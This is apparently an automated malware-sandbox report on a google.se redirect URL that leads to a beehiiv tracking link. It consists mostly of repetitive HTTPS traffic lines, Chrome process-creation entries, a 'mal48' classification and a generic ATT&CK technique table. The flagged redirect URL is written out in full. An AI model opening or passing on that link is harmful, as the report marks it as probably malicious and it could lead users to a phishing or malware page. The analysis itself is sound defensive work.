Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49913 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: classification engineClassification label: mal48.win@21/77@38/14
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2232,i,15471388682000666349,14317564674064467546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2232,i,15471388682000666349,14317564674064467546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
